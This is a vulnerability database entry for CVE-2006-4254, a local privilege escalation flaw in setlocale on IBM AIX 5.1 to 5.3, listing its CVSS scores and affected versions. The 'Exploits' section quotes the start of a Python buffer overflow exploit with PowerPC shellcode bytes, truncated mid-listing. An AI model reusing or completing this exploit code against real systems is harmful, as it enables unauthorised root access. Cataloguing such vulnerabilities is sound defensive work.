7.5
CVSSv2

CVE-2006-4254

Published: 21/08/2006 Updated: 20/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Unspecified vulnerability in setlocale in IBM AIX 5.1.0 up to and including 5.3.0 allows local users to gain privileges via unspecified vectors.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm aix 5.2

ibm aix 5.3

ibm aix 5.1

Exploits

# #setlocale() exploit for aix 52 ( CVE-2006-4254 ) #thomaspollet@gmailcom # from os import execve bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"*2350 shellcode=( # by intropy <at> caughqorg "\x7c\xa5\x2a\x79" # xor r5,r5,r5 "\x40\x82\xff\xfd" # bnel <shellcode> "\x7f\xe8\x02\xa6" # mflr r31 ...
IBM AIX versions 530 and below setlocale() local privilege escalation exploit ...